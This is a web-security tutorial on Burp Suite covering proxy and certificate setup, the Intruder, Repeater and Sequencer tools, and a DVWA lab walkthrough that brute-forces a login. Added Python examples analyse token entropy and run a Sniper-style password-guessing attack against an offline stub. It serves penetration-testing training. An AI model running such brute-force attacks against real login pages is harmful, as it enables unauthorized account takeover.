Burp Suite: Webpage Enumeration and Vulnerability Testing

Where to start with a whole domain at your fingertips?

Nicholas Handy
7 min read · Jul 31, 2018

So you want to start web application security testing or penetration testing? Every security researcher has their favorite tools, and one that is sure to top many of their lists is Burp Suite. Before we can test a website for vulnerabilities we must understand what attack surface is available to us. Burp lets us map out every host in our scope and lets us modify our interactions with the web application by acting as a middle-man (an intercepting proxy) between the browser and the website.

Disclaimer: Only use Burp on domains that you have permission to scan and attack. Using Burp Suite on domains you do not own can be illegal. Stay safe and use intentionally vulnerable applications for practice. There are some linked at the end of the article.

Learning Goals

  • Understanding Burp Suite
  • Burp Suite Setup
  • Basic Features
  • Practical Example Walk through

What is Burp Suite?

Burp Suite is a comprehensive platform for web application security testing. It can be used for detailed enumeration and analysis of web applications. At its core, the tool intercepts HTTP/S requests and acts as a middle-man between the browser and the web server. Every request and response is captured as the user navigates the site, and this record of how the application behaves is what gives insight into its security.

Burp can act as a middle man intercepting traffic from your browser to a webpage allowing you to modify and automate changes to webpage requests.

Opening Burp you are greeted with a blank project with a bunch of tabs. Don’t worry, we will cover the essential tabs.

Burp Suite Setup

Confirm Burp Proxy Listener is Active

  • Open burp and navigate to the proxy → options tab
  • Verify that the proxy listener is active and set to 127.0.0.1:8080

Configure Proxy in Web Browser

  • For Firefox navigate to preferences → advanced → network → settings (in current Firefox releases this lives under Settings → General → Network Settings)
  • Turn on Manual Proxy Configuration and verify it points at the same address Burp is listening on (127.0.0.1, port 8080). Make sure the proxy is also used for HTTPS, and that 127.0.0.1 is not listed as an exception, or traffic to your local test application will bypass Burp.

Installing Burp SSL Certificate

  • With the browser now proxying through Burp, navigate to http://burp and download the certificate by clicking CA Certificate on the right. Without this step Burp has to terminate HTTPS with its own certificate, and the browser will show a certificate error for every HTTPS site.
  • Head back to the network security settings page in Firefox and click on Certificates (View Certificates → Authorities → Import)
  • From there, import the certificate you downloaded and tick the trust boxes, at minimum "Trust this CA to identify websites"
  • Caveat: Burp generates a unique CA for each installation, and anyone holding its private key can silently intercept HTTPS for a browser that trusts it. Install it only in the browser profile you use for testing, not the one you use for everyday browsing.

Basic Features

To start let’s get familiar with some of the common tabs available in Burp Suite — Intruder, Repeater and Sequencer

Intruder

With Burp Intruder, customized attacks can be automated against web applications. Customizing an attack requires that we specify one or more payloads and the positions in the HTTP request where those payloads will be inserted. Intruder then sends one request per payload and tabulates the responses so that differences stand out.

  • Use Cases: Enumerating identifiers, harvesting useful data and fuzzing for vulnerabilities.

Repeater

  • Repeater can be used to re-send individual HTTP requests after manually editing them. This becomes tremendously useful when trying a variety of payloads against the same request. With Repeater you can tweak parameters on the same page without doing any extra work in the browser. Issuing requests in a specific sequence becomes much easier, and you can see how the page reacts to a changed parameter at each step.
  • Use Cases: Testing a set of specific parameters on the same webpage request, reissuing requests to manually verify reported issues.

Sequencer

  • Burp Sequencer can be used to analyze the quality of randomness in a sample of data items. This means that Sequencer is the tool for testing values the application relies on being unpredictable: it captures a large sample of tokens and runs character-level and bit-level statistical tests on them.
  • Use Cases: Testing session identifiers, anti-CSRF tokens, password reset tokens, etc.
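To make the Sequencer idea concrete, here is an added example (not part of the original article and not Burp's own implementation) that performs one of the bit-level checks Sequencer reports: for each bit position across a sample of tokens, how often is that bit set? Summing the per-position Shannon entropies gives an upper bound on how many of the token's bits actually carry information in the sample. Both token generators are constructed for the illustration; the "weak" one renders a counter as hex, which looks random to the eye but only ever changes its low bits.

```python
"""Bit-level analysis of a token sample, in the spirit of Burp Sequencer.

Added example: the generators below are constructed stand-ins, not code from
any real application, and this is not Burp's own analysis code.
"""
import math
import secrets


def weak_tokens(n, start=0x5F3A1C00):
    """Constructed weak generator: a counter rendered as 8 hex characters.
    Only the low bits change from one token to the next."""
    return ["%08x" % (start + i) for i in range(n)]


def strong_tokens(n):
    """Constructed strong generator: 32 bits per token from the OS CSPRNG."""
    return [secrets.token_hex(4) for _ in range(n)]


def token_bits(token):
    """Hex token -> list of bits, most significant bit first."""
    width = len(token) * 4
    value = int(token, 16)
    return [(value >> (width - 1 - i)) & 1 for i in range(width)]


def bit_frequencies(tokens):
    """Fraction of the sample in which each bit position is set to 1."""
    rows = [token_bits(t) for t in tokens]
    width = len(rows[0])
    return [sum(r[i] for r in rows) / len(rows) for i in range(width)]


def effective_entropy_bits(tokens):
    """Sum of per-position Shannon entropies over the sample.

    This is an upper bound: it treats bit positions as independent, so a
    counter whose low 8 bits cycle through every value still scores 8 bits
    even though the next token is trivially predictable. Sequencer's tests
    have the same blind spot, which is why a good score is never proof of
    unpredictability while a bad score is conclusive.
    """
    total = 0.0
    for p in bit_frequencies(tokens):
        if 0.0 < p < 1.0:
            total += -(p * math.log2(p) + (1.0 - p) * math.log2(1.0 - p))
    return total


def constant_bits(tokens):
    """Number of bit positions that never change across the sample."""
    return sum(1 for p in bit_frequencies(tokens) if p in (0.0, 1.0))


if __name__ == "__main__":
    for name, sample in (("weak", weak_tokens(256)), ("strong", strong_tokens(256))):
        width = len(sample[0]) * 4
        print("%-6s %5.1f of %d bits effective, %d constant bits"
              % (name, effective_entropy_bits(sample), width, constant_bits(sample)))
```

With 256 samples the counter-based tokens score 8 effective bits out of 32 with 24 positions that never change, while the CSPRNG tokens score close to the full 32. A real session token that scores like the weak generator is a finding regardless of how long it looks.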

Example Vulnerability Exploitation with Burp

Burp Suite gives us additional automation tools to use while testing a web application.

Damn Vulnerable Web Application

In order to practice attacking vulnerabilities we will use the Damn Vulnerable Web Application (DVWA). DVWA comes pre-loaded with Metasploitable 2 but can also be downloaded independently and run on a local web server. DVWA is sectioned off by attack type, as seen in its side navigation bar. This gives us an opportunity to explore common web attacks at varying levels of difficulty.

Once DVWA is up and running, login and navigate to the security tab to change the security level to low. This will make the website vulnerable to a wider range of attacks which makes it easier when getting comfortable with a new tool.

Brute Forcing a Login Page

For this example we will use Burp’s Intruder to alter the HTTP request for the login page within DVWA.

  • Start by logging in to DVWA using the username “admin” and the password “password.”
  • Verify that the security for DVWA is on low for this attack. Higher levels of security will prevent this attack from working.
  • Navigate to the Brute Force section of the side navigation. Here you will see input boxes for username and password.
  • Passing in the wrong credentials will pop up an error.
Figure: attempted username admin and password 1234, which threw an error.

Let’s suppose we know the username for the logged in user on the site. We can use Burp to intercept requests and attempt a list of passwords on this login page.

Figure: the intercepted request shows the username and password being passed in the URL, since the form submits via GET.
  • Turn on Intercept in the Proxy → Intercept tab, submit the form again, and the raw request will appear in Burp. Right click on the raw request and choose Send to Intruder.
  • From the Intruder → Positions tab we can select the parameters we would like to modify in our request. Off the bat all possible inputs are selected. Hit the Clear button on the right to clear the selections.
  • Highlight the password value. In my case the initial password entered was "1234." Select that value and hit the Add button on the right.
More selections could be made to modify more values in each request.
  • The last piece of this attack is to add a payload that will replace the password value we selected.
  • Move to the Payloads tab. The payload type stays as Simple list, and below it we add the values Burp will substitute into the marked position.
  • The image below shows the password guesses added to the payload list for Burp to try. Common password lists can be downloaded online for more extensive brute-forcing attempts.
  • Leave the attack type as Sniper and click Start Attack.
  • A new window should pop up showing the results of Intruder, one row per payload.
  • How do we know if it worked? Looking at the Length column tells us that when the payload is "password" we get a different response size than the other submissions. A single row that differs from the baseline is the signal to take a closer look at that value. When the sizes happen to coincide, Intruder's Options → Grep - Match can flag rows by the presence or absence of the login failure message instead.
  • Clicking on the row will pop up additional details at the bottom of the window.
  • Moving to the Render tab will show us the page as returned when that specific payload was submitted.
  • As you can see, the password worked and we are shown the protected page. This can be verified by going to DVWA and trying admin and password in the login form. The same result should appear.
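The procedure above can be stated as a small program, which makes it clear what Intruder is actually doing under the hood. The following is an added example, not code from the article or from PortSwigger: it parses a request template with Burp's § payload markers, runs a Sniper attack (each position in turn takes every payload while the others keep their original value), records the response length per request, and picks out the rows whose length differs from the baseline, exactly the check made by eye on the Length column above. The target is a constructed stand-in for DVWA's low-security Brute Force page, so the whole thing runs offline; the request line, cookie and response bodies are assumptions modelled on that page, not captured output.

```python
"""Sniper-style brute force in the manner of Burp Intruder.

Added example, not the article's or PortSwigger's code. The request template,
the password list and the DVWA-like target below are all constructed so that
the script runs offline.
"""
from collections import Counter
from urllib.parse import parse_qs, urlsplit

MARK = "\u00a7"  # Burp's payload position marker, "§"

# Constructed: the DVWA Brute Force request as Burp shows it once the password
# value has been wrapped in markers on the Positions tab. The form submits via
# GET, so the credentials sit in the query string.
REQUEST_TEMPLATE = (
    "GET /vulnerabilities/brute/?username=admin&password=" + MARK + "1234" + MARK
    + "&Login=Login HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Cookie: security=low; PHPSESSID=constructed\r\n"
    "\r\n"
)

# Constructed payload list, the kind of short guess list pasted into a
# "Simple list" payload set.
PAYLOADS = ["123456", "letmein", "admin", "password", "qwerty", "dvwa"]


def dvwa_stub(raw_request):
    """Stand-in for DVWA's low-security Brute Force page (constructed, not DVWA's
    code). Only admin/password succeeds; both outcomes share the same page chrome,
    so the response sizes differ by only a few bytes, as they do on the real page."""
    request_line = raw_request.split("\r\n", 1)[0]
    target = request_line.split(" ")[1]
    params = parse_qs(urlsplit(target).query)
    user = params.get("username", [""])[0]
    pwd = params.get("password", [""])[0]
    if user == "admin" and pwd == "password":
        result = "<p>Welcome to the password protected area admin</p>"
    else:
        result = "<pre><br />Username and/or password incorrect.</pre>"
    body = "<html><body><h1>Vulnerability: Brute Force</h1>" + result + "</body></html>"
    return 200, body


def split_positions(template):
    """Split a §-marked template into its literal chunks and the original values
    inside each marker pair (the values Intruder will replace)."""
    parts = template.split(MARK)
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced payload markers")
    return parts[0::2], parts[1::2]


def build_request(literals, values):
    """Reassemble a request from literal chunks and one value per position."""
    out = [literals[0]]
    for value, literal in zip(values, literals[1:]):
        out.append(value)
        out.append(literal)
    return "".join(out)


def run_sniper(template, payloads, send):
    """Intruder's Sniper attack: one position at a time takes each payload while
    every other position keeps its original value. One record per request."""
    literals, originals = split_positions(template)
    results = []
    for pos in range(len(originals)):
        for payload in payloads:
            values = list(originals)
            values[pos] = payload
            status, body = send(build_request(literals, values))
            # Burp's Length column counts headers too; the stub only returns a body.
            results.append({"position": pos, "payload": payload,
                            "status": status, "length": len(body), "body": body})
    return results


def length_outliers(results):
    """The check made by eye on the Length column: the most common length is
    the 'wrong password' baseline, and any row that differs deserves a look."""
    baseline, _ = Counter(r["length"] for r in results).most_common(1)[0]
    return [r for r in results if r["length"] != baseline]


def grep_match(results, needle):
    """Equivalent of Intruder's Grep - Match: rows whose response contains needle."""
    return [r for r in results if needle in r["body"]]


if __name__ == "__main__":
    rows = run_sniper(REQUEST_TEMPLATE, PAYLOADS, dvwa_stub)
    for r in rows:
        print("%-10s status=%d length=%d" % (r["payload"], r["status"], r["length"]))
    print("length outliers:", [r["payload"] for r in length_outliers(rows)])
    print("no failure message:", [r["payload"] for r in rows
                                  if r not in grep_match(rows, "incorrect")])
```

Swapping `dvwa_stub` for a function that opens a socket to the real target turns this into a working attack, which is also why it must only ever be pointed at an application you are authorized to test. Note that the length check is only a heuristic: when success and failure pages happen to be the same size, the grep approach is the one that still works.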

Congratulations! You have now completed your first attack using Burp to modify HTTP requests. This is a simple example of how Burp can be used to perform application security tests. There are many more web application attacks out there. Burp Suite provides additional tools to work through attacks either manually or automated. Digging deeper into Burp Suite will reveal how powerful it can really be.

What’s Next?

  • Check out additional attack walk-throughs on Burp Suite’s website to get familiar with Burp’s role in more intensive attacks.
  • Use Burp to perform common web attacks on another vulnerable web application such as Mutillidae or the OWASP WebGoat Project.
  • Move on to using Burp in your next web application testing workflow and play with third-party extensions for Burp (available through the BApp Store) to add more functionality.
  • Upgrade to the Pro version to check out the vulnerability scanning capabilities of Burp Suite. If the price for Pro seems too steep, OWASP ZAP is a free alternative to Burp that includes vulnerability scanning.

Additional Resources
